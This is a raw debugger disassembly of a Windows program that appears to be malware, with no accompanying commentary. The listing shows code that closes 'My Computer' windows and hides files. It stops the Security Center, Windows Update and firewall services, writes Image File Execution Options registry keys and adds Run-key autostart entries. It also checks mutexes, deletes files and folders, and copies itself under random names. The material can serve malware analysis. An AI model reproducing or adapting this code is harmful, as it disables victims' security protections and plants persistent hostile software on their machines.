0040F445 |. 6A 00 |push 0 ; |wParam = 0
0040F447 |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F449 |. 68 54034100 |push 00410354 ; |/Title = "我的電腦"
0040F44E |. 6A 00 |push 0 ; ||Class = 0
0040F450 |. E8 6F53FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F455 |. 50 |push eax ; |hWnd
0040F456 |. E8 B153FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F45B |. 6A 00 |push 0 ; /lParam = 0
0040F45D |. 6A 00 |push 0 ; |wParam = 0
0040F45F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F461 |. 68 60034100 |push 00410360 ; |/Title = "My Computer"
0040F466 |. 6A 00 |push 0 ; ||Class = 0
0040F468 |. E8 5753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F46D |. 50 |push eax ; |hWnd
0040F46E |. E8 9953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F473 |. 6A 06 |push 6
0040F475 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F47A |. FF30 |push dword ptr ds:[eax]
0040F47C |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F481 |. FF30 |push dword ptr ds:[eax]
0040F483 |. FF37 |push dword ptr ds:[edi]
0040F485 |. 8D45 D8 |lea eax, dword ptr ss:[ebp-28]
0040F488 |. BA 03000000 |mov edx, 3
0040F48D |. E8 C648FFFF |call 00403D58
0040F492 |. 8B45 D8 |mov eax, dword ptr ss:[ebp-28]
0040F495 |. E8 FE49FFFF |call 00403E98
0040F49A |. 50 |push eax ; |FileName
0040F49B |. E8 EC52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4A0 |. 6A 06 |push 6
0040F4A2 |. 8B0D A4144100 |mov ecx, dword ptr ds:[4114A4] ; 1.004113E0
0040F4A8 |. 8B09 |mov ecx, dword ptr ds:[ecx]
0040F4AA |. 8B15 58154100 |mov edx, dword ptr ds:[411558] ; 1.004130F8
0040F4B0 |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4B2 |. 8D45 D4 |lea eax, dword ptr ss:[ebp-2C]
0040F4B5 |. E8 2A48FFFF |call 00403CE4
0040F4BA |. 8B45 D4 |mov eax, dword ptr ss:[ebp-2C]
0040F4BD |. E8 D649FFFF |call 00403E98
0040F4C2 |. 50 |push eax ; |FileName
0040F4C3 |. E8 C452FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4C8 |. 6A 06 |push 6
0040F4CA |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4CD |. E8 B284FFFF |call 00407984
0040F4D2 |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4D5 |. 8B15 B4144100 |mov edx, dword ptr ds:[4114B4] ; 1.004113D4
0040F4DB |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4DD |. E8 BE47FFFF |call 00403CA0
0040F4E2 |. 8B45 D0 |mov eax, dword ptr ss:[ebp-30]
0040F4E5 |. E8 AE49FFFF |call 00403E98
0040F4EA |. 50 |push eax ; |FileName
0040F4EB |. E8 9C52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4F0 |. 6A 06 |push 6
0040F4F2 |. 8D45 C8 |lea eax, dword ptr ss:[ebp-38]
0040F4F5 |. E8 2685FFFF |call 00407A20
0040F4FA |. FF75 C8 |push dword ptr ss:[ebp-38]
0040F4FD |. A1 5C144100 |mov eax, dword ptr ds:[41145C]
0040F502 |. FF30 |push dword ptr ds:[eax]
0040F504 |. FF37 |push dword ptr ds:[edi]
0040F506 |. 8D45 CC |lea eax, dword ptr ss:[ebp-34]
0040F509 |. BA 03000000 |mov edx, 3
0040F50E |. E8 4548FFFF |call 00403D58
0040F513 |. 8B45 CC |mov eax, dword ptr ss:[ebp-34]
0040F516 |. E8 7D49FFFF |call 00403E98
0040F51B |. 50 |push eax ; |FileName
0040F51C |. E8 6B52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F521 |. 6A 06 |push 6
0040F523 |. 8D45 C0 |lea eax, dword ptr ss:[ebp-40]
0040F526 |. E8 A585FFFF |call 00407AD0
0040F52B |. FF75 C0 |push dword ptr ss:[ebp-40]
0040F52E |. A1 3C154100 |mov eax, dword ptr ds:[41153C]
0040F533 |. FF30 |push dword ptr ds:[eax]
0040F535 |. FF37 |push dword ptr ds:[edi]
0040F537 |. 8D45 C4 |lea eax, dword ptr ss:[ebp-3C]
0040F53A |. BA 03000000 |mov edx, 3
0040F53F |. E8 1448FFFF |call 00403D58
0040F544 |. 8B45 C4 |mov eax, dword ptr ss:[ebp-3C]
0040F547 |. E8 4C49FFFF |call 00403E98
0040F54C |. 50 |push eax ; |FileName
0040F54D |. E8 3A52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F552 |. 6A 06 |push 6
0040F554 |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F557 |. E8 2884FFFF |call 00407984
0040F55C |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F55F |. BA 74034100 |mov edx, 00410374 ; ASCII "Common Files\System"
0040F564 |. E8 3747FFFF |call 00403CA0
0040F569 |. 8B45 BC |mov eax, dword ptr ss:[ebp-44]
0040F56C |. E8 2749FFFF |call 00403E98
0040F571 |. 50 |push eax ; |FileName
0040F572 |. E8 1552FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F577 |. 6A 06 |push 6
0040F579 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F57C |. E8 0384FFFF |call 00407984
0040F581 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F584 |. BA 90034100 |mov edx, 00410390 ; ASCII "Common Files\Microsoft Shared"
0040F589 |. E8 1247FFFF |call 00403CA0
0040F58E |. 8B45 B8 |mov eax, dword ptr ss:[ebp-48]
0040F591 |. E8 0249FFFF |call 00403E98
0040F596 |. 50 |push eax ; |FileName
0040F597 |. E8 F051FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F59C |> 83C3 04 |add ebx, 4
0040F59F |. 4E |dec esi
0040F5A0 |.^ 0F85 FBFDFFFF \jnz 0040F3A1
0040F5A6 |. B8 B8034100 mov eax, 004103B8 ; ASCII "wscsvc"
0040F5AB |. E8 2087FFFF call 00407CD0
0040F5B0 |. B8 C8034100 mov eax, 004103C8 ; ASCII "helpsvc"
0040F5B5 |. E8 1687FFFF call 00407CD0
0040F5BA |. B8 D8034100 mov eax, 004103D8 ; ASCII "wuauserv"
0040F5BF |. E8 0C87FFFF call 00407CD0
0040F5C4 |. B8 EC034100 mov eax, 004103EC ; ASCII "SharedAccess"
0040F5C9 |. E8 0287FFFF call 00407CD0
0040F5CE |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5D3 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F5D8 |. FF30 push dword ptr ds:[eax]
0040F5DA |. FF37 push dword ptr ds:[edi]
0040F5DC |. 8D45 B4 lea eax, dword ptr ss:[ebp-4C]
0040F5DF |. BA 03000000 mov edx, 3
0040F5E4 |. E8 6F47FFFF call 00403D58
0040F5E9 |. 8B55 B4 mov edx, dword ptr ss:[ebp-4C]
0040F5EC |. B8 02000080 mov eax, 80000002
0040F5F1 |. E8 3E76FFFF call 00406C34
0040F5F6 |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5FB |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F600 |. FF30 push dword ptr ds:[eax]
0040F602 |. FF37 push dword ptr ds:[edi]
0040F604 |. 8D45 B0 lea eax, dword ptr ss:[ebp-50]
0040F607 |. BA 03000000 mov edx, 3
0040F60C |. E8 4747FFFF call 00403D58
0040F611 |. 8B55 B0 mov edx, dword ptr ss:[ebp-50]
0040F614 |. B8 02000080 mov eax, 80000002
0040F619 |. E8 1676FFFF call 00406C34
0040F61E |. 8D55 AC lea edx, dword ptr ss:[ebp-54]
0040F621 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F626 |. 8B00 mov eax, dword ptr ds:[eax]
0040F628 |. E8 D36DFFFF call 00406400
0040F62D |. 8B45 AC mov eax, dword ptr ss:[ebp-54]
0040F630 |. 50 push eax
0040F631 |. 8D45 A0 lea eax, dword ptr ss:[ebp-60]
0040F634 |. E8 E783FFFF call 00407A20
0040F639 |. FF75 A0 push dword ptr ss:[ebp-60]
0040F63C |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F641 |. FF30 push dword ptr ds:[eax]
0040F643 |. FF37 push dword ptr ds:[edi]
0040F645 |. 8D45 A4 lea eax, dword ptr ss:[ebp-5C]
0040F648 |. BA 03000000 mov edx, 3
0040F64D |. E8 0647FFFF call 00403D58
0040F652 |. 8B45 A4 mov eax, dword ptr ss:[ebp-5C]
0040F655 |. 8D55 A8 lea edx, dword ptr ss:[ebp-58]
0040F658 |. E8 A36DFFFF call 00406400
0040F65D |. 8B55 A8 mov edx, dword ptr ss:[ebp-58]
0040F660 |. 58 pop eax
0040F661 |. E8 7E47FFFF call 00403DE4
0040F666 |. 0F84 C4060000 je 0040FD30
0040F66C |. 8D55 9C lea edx, dword ptr ss:[ebp-64]
0040F66F |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F674 |. 8B00 mov eax, dword ptr ds:[eax]
0040F676 |. E8 856DFFFF call 00406400
0040F67B |. 8B45 9C mov eax, dword ptr ss:[ebp-64]
0040F67E |. 50 push eax
0040F67F |. 8D45 90 lea eax, dword ptr ss:[ebp-70]
0040F682 |. E8 4984FFFF call 00407AD0
0040F687 |. FF75 90 push dword ptr ss:[ebp-70]
0040F68A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F68F |. FF30 push dword ptr ds:[eax]
0040F691 |. FF37 push dword ptr ds:[edi]
0040F693 |. 8D45 94 lea eax, dword ptr ss:[ebp-6C]
0040F696 |. BA 03000000 mov edx, 3
0040F69B |. E8 B846FFFF call 00403D58
0040F6A0 |. 8B45 94 mov eax, dword ptr ss:[ebp-6C]
0040F6A3 |. 8D55 98 lea edx, dword ptr ss:[ebp-68]
0040F6A6 |. E8 556DFFFF call 00406400
0040F6AB |. 8B55 98 mov edx, dword ptr ss:[ebp-68]
0040F6AE |. 58 pop eax
0040F6AF |. E8 3047FFFF call 00403DE4
0040F6B4 |. 0F84 76060000 je 0040FD30
0040F6BA |. 8D55 8C lea edx, dword ptr ss:[ebp-74]
0040F6BD |. A1 60144100 mov eax, dword ptr ds:[411460]
0040F6C2 |. 8B00 mov eax, dword ptr ds:[eax]
0040F6C4 |. E8 D36FFFFF call 0040669C
0040F6C9 |. 8D45 8C lea eax, dword ptr ss:[ebp-74]
0040F6CC |. 50 push eax
0040F6CD |. 8D45 84 lea eax, dword ptr ss:[ebp-7C]
0040F6D0 |. E8 F369FFFF call 004060C8
0040F6D5 |. 8B45 84 mov eax, dword ptr ss:[ebp-7C]
0040F6D8 |. 8D55 88 lea edx, dword ptr ss:[ebp-78]
0040F6DB |. E8 AC84FFFF call 00407B8C
0040F6E0 |. 8B55 88 mov edx, dword ptr ss:[ebp-78]
0040F6E3 |. 58 pop eax
0040F6E4 |. E8 B745FFFF call 00403CA0
0040F6E9 |. 8B45 8C mov eax, dword ptr ss:[ebp-74]
0040F6EC |. E8 A747FFFF call 00403E98
0040F6F1 |. 50 push eax ; /MutexName
0040F6F2 |. 6A 00 push 0 ; |Inheritable = FALSE
0040F6F4 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F6F9 |. E8 6650FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F6FE |. 85C0 test eax, eax
0040F700 |. 0F85 EA0B0000 jnz 004102F0
0040F706 |. 8D85 7CFFFFFF lea eax, dword ptr ss:[ebp-84]
0040F70C |. E8 B769FFFF call 004060C8
0040F711 |. 8B85 7CFFFFFF mov eax, dword ptr ss:[ebp-84]
0040F717 |. 8D55 80 lea edx, dword ptr ss:[ebp-80]
0040F71A |. E8 6D84FFFF call 00407B8C
0040F71F |. 8D45 80 lea eax, dword ptr ss:[ebp-80]
0040F722 |. 50 push eax
0040F723 |. 8D95 78FFFFFF lea edx, dword ptr ss:[ebp-88]
0040F729 |. A1 64144100 mov eax, dword ptr ds:[411464]
0040F72E |. 8B00 mov eax, dword ptr ds:[eax]
0040F730 |. E8 676FFFFF call 0040669C
0040F735 |. 8B95 78FFFFFF mov edx, dword ptr ss:[ebp-88]
0040F73B |. 58 pop eax
0040F73C |. E8 5F45FFFF call 00403CA0
0040F741 |. 8B45 80 mov eax, dword ptr ss:[ebp-80]
0040F744 |. E8 4F47FFFF call 00403E98
0040F749 |. 50 push eax ; /MutexName
0040F74A |. 6A 00 push 0 ; |Inheritable = FALSE
0040F74C |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F751 |. E8 0E50FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F756 |. 85C0 test eax, eax
0040F758 |. 0F85 920B0000 jnz 004102F0
0040F75E |. E8 0530FFFF call 00402768
0040F763 |. B8 19000000 mov eax, 19
0040F768 |. E8 9F35FFFF call 00402D0C
0040F76D |. 8BD0 mov edx, eax
0040F76F |. 83C2 61 add edx, 61
0040F772 |. 8D85 74FFFFFF lea eax, dword ptr ss:[ebp-8C]
0040F778 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F77B |. C600 01 mov byte ptr ds:[eax], 1
0040F77E |. 8D95 74FFFFFF lea edx, dword ptr ss:[ebp-8C]
0040F784 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F78A |. E8 CD34FFFF call 00402C5C
0040F78F |. B8 19000000 mov eax, 19
0040F794 |. E8 7335FFFF call 00402D0C
0040F799 |. 8BD0 mov edx, eax
0040F79B |. 83C2 61 add edx, 61
0040F79E |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7A4 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7A7 |. C600 01 mov byte ptr ds:[eax], 1
0040F7AA |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7B0 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F7B6 |. B1 02 mov cl, 2
0040F7B8 |. E8 6F34FFFF call 00402C2C
0040F7BD |. 8D95 70FFFFFF lea edx, dword ptr ss:[ebp-90]
0040F7C3 |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7C9 |. E8 8E34FFFF call 00402C5C
0040F7CE |. B8 19000000 mov eax, 19
0040F7D3 |. E8 3435FFFF call 00402D0C
0040F7D8 |. 8BD0 mov edx, eax
0040F7DA |. 83C2 61 add edx, 61
0040F7DD |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7E3 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7E6 |. C600 01 mov byte ptr ds:[eax], 1
0040F7E9 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7EF |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7F5 |. B1 03 mov cl, 3
0040F7F7 |. E8 3034FFFF call 00402C2C
0040F7FC |. 8D95 68FFFFFF lea edx, dword ptr ss:[ebp-98]
0040F802 |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F808 |. E8 4F34FFFF call 00402C5C
0040F80D |. B8 19000000 mov eax, 19
0040F812 |. E8 F534FFFF call 00402D0C
0040F817 |. 8BD0 mov edx, eax
0040F819 |. 83C2 61 add edx, 61
0040F81C |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F822 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F825 |. C600 01 mov byte ptr ds:[eax], 1
0040F828 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F82E |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F834 |. B1 04 mov cl, 4
0040F836 |. E8 F133FFFF call 00402C2C
0040F83B |. 8D95 60FFFFFF lea edx, dword ptr ss:[ebp-A0]
0040F841 |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F847 |. E8 1034FFFF call 00402C5C
0040F84C |. B8 19000000 mov eax, 19
0040F851 |. E8 B634FFFF call 00402D0C
0040F856 |. 8BD0 mov edx, eax
0040F858 |. 83C2 61 add edx, 61
0040F85B |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F861 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F864 |. C600 01 mov byte ptr ds:[eax], 1
0040F867 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F86D |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F873 |. B1 05 mov cl, 5
0040F875 |. E8 B233FFFF call 00402C2C
0040F87A |. 8D95 58FFFFFF lea edx, dword ptr ss:[ebp-A8]
0040F880 |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F886 |. E8 D133FFFF call 00402C5C
0040F88B |. B8 19000000 mov eax, 19
0040F890 |. E8 7734FFFF call 00402D0C
0040F895 |. 8BD0 mov edx, eax
0040F897 |. 83C2 61 add edx, 61
0040F89A |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F8A0 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F8A3 |. C600 01 mov byte ptr ds:[eax], 1
0040F8A6 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F8AC |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F8B2 |. B1 06 mov cl, 6
0040F8B4 |. E8 7333FFFF call 00402C2C
0040F8B9 |. 8D95 50FFFFFF lea edx, dword ptr ss:[ebp-B0]
0040F8BF |. B8 0C314100 mov eax, 0041310C
0040F8C4 |. E8 AB43FFFF call 00403C74
0040F8C9 |. 68 80000000 push 80
0040F8CE |. 8D85 48FFFFFF lea eax, dword ptr ss:[ebp-B8]
0040F8D4 |. E8 4781FFFF call 00407A20
0040F8D9 |. FFB5 48FFFFFF push dword ptr ss:[ebp-B8]
0040F8DF |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F8E4 |. FF30 push dword ptr ds:[eax]
0040F8E6 |. FF37 push dword ptr ds:[edi]
0040F8E8 |. 8D85 4CFFFFFF lea eax, dword ptr ss:[ebp-B4]
0040F8EE |. BA 03000000 mov edx, 3
0040F8F3 |. E8 6044FFFF call 00403D58
0040F8F8 |. 8B85 4CFFFFFF mov eax, dword ptr ss:[ebp-B4]
0040F8FE |. E8 9545FFFF call 00403E98
0040F903 |. 50 push eax ; |FileName
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F909 |. 68 80000000 push 80
0040F90E |. 8D85 40FFFFFF lea eax, dword ptr ss:[ebp-C0]
0040F914 |. E8 B781FFFF call 00407AD0
0040F919 |. FFB5 40FFFFFF push dword ptr ss:[ebp-C0]
0040F91F |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F924 |. FF30 push dword ptr ds:[eax]
0040F926 |. FF37 push dword ptr ds:[edi]
0040F928 |. 8D85 44FFFFFF lea eax, dword ptr ss:[ebp-BC]
0040F92E |. BA 03000000 mov edx, 3
0040F933 |. E8 2044FFFF call 00403D58
0040F938 |. 8B85 44FFFFFF mov eax, dword ptr ss:[ebp-BC]
0040F93E |. E8 5545FFFF call 00403E98
0040F943 |. 50 push eax ; |FileName
0040F944 |. E8 434EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F949 |. 8D85 38FFFFFF lea eax, dword ptr ss:[ebp-C8]
0040F94F |. E8 CC80FFFF call 00407A20
0040F954 |. FFB5 38FFFFFF push dword ptr ss:[ebp-C8]
0040F95A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F95F |. FF30 push dword ptr ds:[eax]
0040F961 |. FF37 push dword ptr ds:[edi]
0040F963 |. 8D85 3CFFFFFF lea eax, dword ptr ss:[ebp-C4]
0040F969 |. BA 03000000 mov edx, 3
0040F96E |. E8 E543FFFF call 00403D58
0040F973 |. 8B85 3CFFFFFF mov eax, dword ptr ss:[ebp-C4]
0040F979 |. E8 1A45FFFF call 00403E98
0040F97E |. 50 push eax ; /FileName
0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F984 |. 8D85 30FFFFFF lea eax, dword ptr ss:[ebp-D0]
0040F98A |. E8 4181FFFF call 00407AD0
0040F98F |. FFB5 30FFFFFF push dword ptr ss:[ebp-D0]
0040F995 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F99A |. FF30 push dword ptr ds:[eax]
0040F99C |. FF37 push dword ptr ds:[edi]
0040F99E |. 8D85 34FFFFFF lea eax, dword ptr ss:[ebp-CC]
0040F9A4 |. BA 03000000 mov edx, 3
0040F9A9 |. E8 AA43FFFF call 00403D58
0040F9AE |. 8B85 34FFFFFF mov eax, dword ptr ss:[ebp-CC]
0040F9B4 |. E8 DF44FFFF call 00403E98
0040F9B9 |. 50 push eax ; /FileName
0040F9BA |. E8 054DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9BF |. 8D85 28FFFFFF lea eax, dword ptr ss:[ebp-D8]
0040F9C5 |. E8 5680FFFF call 00407A20
0040F9CA |. FFB5 28FFFFFF push dword ptr ss:[ebp-D8]
0040F9D0 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F9D5 |. FF30 push dword ptr ds:[eax]
0040F9D7 |. FF37 push dword ptr ds:[edi]
0040F9D9 |. 8D85 2CFFFFFF lea eax, dword ptr ss:[ebp-D4]
0040F9DF |. BA 03000000 mov edx, 3
0040F9E4 |. E8 6F43FFFF call 00403D58
0040F9E9 |. 8B85 2CFFFFFF mov eax, dword ptr ss:[ebp-D4]
0040F9EF |. E8 A444FFFF call 00403E98
0040F9F4 |. 50 push eax ; /Path
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040F9FA |. 8D85 20FFFFFF lea eax, dword ptr ss:[ebp-E0]
0040FA00 |. E8 CB80FFFF call 00407AD0
0040FA05 |. FFB5 20FFFFFF push dword ptr ss:[ebp-E0]
0040FA0B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FA10 |. FF30 push dword ptr ds:[eax]
0040FA12 |. FF37 push dword ptr ds:[edi]
0040FA14 |. 8D85 24FFFFFF lea eax, dword ptr ss:[ebp-DC]
0040FA1A |. BA 03000000 mov edx, 3
0040FA1F |. E8 3443FFFF call 00403D58
0040FA24 |. 8B85 24FFFFFF mov eax, dword ptr ss:[ebp-DC]
0040FA2A |. E8 6944FFFF call 00403E98
0040FA2F |. 50 push eax ; /Path
0040FA30 |. E8 474DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FA35 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA3B |. E8 E07FFFFF call 00407A20
0040FA40 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA46 |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FA4C |. E8 4F42FFFF call 00403CA0
0040FA51 |. 8B85 18FFFFFF mov eax, dword ptr ss:[ebp-E8]
0040FA57 |. E8 3C44FFFF call 00403E98
0040FA5C |. 8BD0 mov edx, eax
0040FA5E |. 8D85 1CFFFFFF lea eax, dword ptr ss:[ebp-E4]
0040FA64 |. E8 DB41FFFF call 00403C44
0040FA69 |. 8B85 1CFFFFFF mov eax, dword ptr ss:[ebp-E4]
0040FA6F |. 50 push eax
0040FA70 |. 8D85 0CFFFFFF lea eax, dword ptr ss:[ebp-F4]
0040FA76 |. E8 A57FFFFF call 00407A20
0040FA7B |. FFB5 0CFFFFFF push dword ptr ss:[ebp-F4]
0040FA81 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FA86 |. FF30 push dword ptr ds:[eax]
0040FA88 |. FF37 push dword ptr ds:[edi]
0040FA8A |. 8D85 10FFFFFF lea eax, dword ptr ss:[ebp-F0]
0040FA90 |. BA 03000000 mov edx, 3
0040FA95 |. E8 BE42FFFF call 00403D58
0040FA9A |. 8B85 10FFFFFF mov eax, dword ptr ss:[ebp-F0]
0040FAA0 |. E8 F343FFFF call 00403E98
0040FAA5 |. 8BD0 mov edx, eax
0040FAA7 |. 8D85 14FFFFFF lea eax, dword ptr ss:[ebp-EC]
0040FAAD |. E8 9241FFFF call 00403C44
0040FAB2 |. 8B85 14FFFFFF mov eax, dword ptr ss:[ebp-EC]
0040FAB8 |. 5A pop edx
0040FAB9 |. E8 A666FFFF call 00406164
0040FABE |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FAC4 |. E8 0780FFFF call 00407AD0
0040FAC9 |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FACF |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FAD5 |. E8 C641FFFF call 00403CA0
0040FADA |. 8B85 04FFFFFF mov eax, dword ptr ss:[ebp-FC]
0040FAE0 |. E8 B343FFFF call 00403E98
0040FAE5 |. 8BD0 mov edx, eax
0040FAE7 |. 8D85 08FFFFFF lea eax, dword ptr ss:[ebp-F8]
0040FAED |. E8 5241FFFF call 00403C44
0040FAF2 |. 8B85 08FFFFFF mov eax, dword ptr ss:[ebp-F8]
0040FAF8 |. 50 push eax
0040FAF9 |. 8D85 F8FEFFFF lea eax, dword ptr ss:[ebp-108]
0040FAFF |. E8 CC7FFFFF call 00407AD0
0040FB04 |. FFB5 F8FEFFFF push dword ptr ss:[ebp-108]
0040FB0A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FB0F |. FF30 push dword ptr ds:[eax]
0040FB11 |. FF37 push dword ptr ds:[edi]
0040FB13 |. 8D85 FCFEFFFF lea eax, dword ptr ss:[ebp-104]
0040FB19 |. BA 03000000 mov edx, 3
0040FB1E |. E8 3542FFFF call 00403D58
0040FB23 |. 8B85 FCFEFFFF mov eax, dword ptr ss:[ebp-104]
0040FB29 |. E8 6A43FFFF call 00403E98
0040FB2E |. 8BD0 mov edx, eax
0040FB30 |. 8D85 00FFFFFF lea eax, dword ptr ss:[ebp-100]
0040FB36 |. E8 0941FFFF call 00403C44
0040FB3B |. 8B85 00FFFFFF mov eax, dword ptr ss:[ebp-100]
0040FB41 |. 5A pop edx
0040FB42 |. E8 1D66FFFF call 00406164
0040FB47 |. A1 B0144100 mov eax, dword ptr ds:[4114B0]
0040FB4C |. 8B00 mov eax, dword ptr ds:[eax]
0040FB4E |. E8 4543FFFF call 00403E98
0040FB53 |. 8BD0 mov edx, eax
0040FB55 |. 8D85 F4FEFFFF lea eax, dword ptr ss:[ebp-10C]
0040FB5B |. E8 E440FFFF call 00403C44
0040FB60 |. 8B8D F4FEFFFF mov ecx, dword ptr ss:[ebp-10C]
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FB70 |. E8 CF6FFFFF call 00406B44
0040FB75 |. A1 50154100 mov eax, dword ptr ds:[411550]
0040FB7A |. 8B00 mov eax, dword ptr ds:[eax]
0040FB7C |. E8 1743FFFF call 00403E98
0040FB81 |. 8BD0 mov edx, eax
0040FB83 |. 8D85 F0FEFFFF lea eax, dword ptr ss:[ebp-110]
0040FB89 |. E8 B640FFFF call 00403C44
0040FB8E |. 8B8D F0FEFFFF mov ecx, dword ptr ss:[ebp-110]
0040FB94 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB99 |. B8 02000080 mov eax, 80000002
0040FB9E |. E8 A16FFFFF call 00406B44
0040FBA3 |. 6A FF push -1
0040FBA5 |. 8D85 E8FEFFFF lea eax, dword ptr ss:[ebp-118]
0040FBAB |. E8 707EFFFF call 00407A20
0040FBB0 |. FFB5 E8FEFFFF push dword ptr ss:[ebp-118]
0040FBB6 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FBBB |. FF30 push dword ptr ds:[eax]
0040FBBD |. FF37 push dword ptr ds:[edi]
0040FBBF |. 8D85 ECFEFFFF lea eax, dword ptr ss:[ebp-114]
0040FBC5 |. BA 03000000 mov edx, 3
0040FBCA |. E8 8941FFFF call 00403D58
0040FBCF |. 8B85 ECFEFFFF mov eax, dword ptr ss:[ebp-114]
0040FBD5 |. E8 BE42FFFF call 00403E98
0040FBDA |. 50 push eax
0040FBDB |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FBE0 |. 8B00 mov eax, dword ptr ds:[eax]
0040FBE2 |. E8 B142FFFF call 00403E98
0040FBE7 |. 50 push eax ; |ExistingFileName
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FBED |. 6A FF push -1
0040FBEF |. 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120]
0040FBF5 |. E8 D67EFFFF call 00407AD0
0040FBFA |. FFB5 E0FEFFFF push dword ptr ss:[ebp-120]
0040FC00 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC05 |. FF30 push dword ptr ds:[eax]
0040FC07 |. FF37 push dword ptr ds:[edi]
0040FC09 |. 8D85 E4FEFFFF lea eax, dword ptr ss:[ebp-11C]
0040FC0F |. BA 03000000 mov edx, 3
0040FC14 |. E8 3F41FFFF call 00403D58
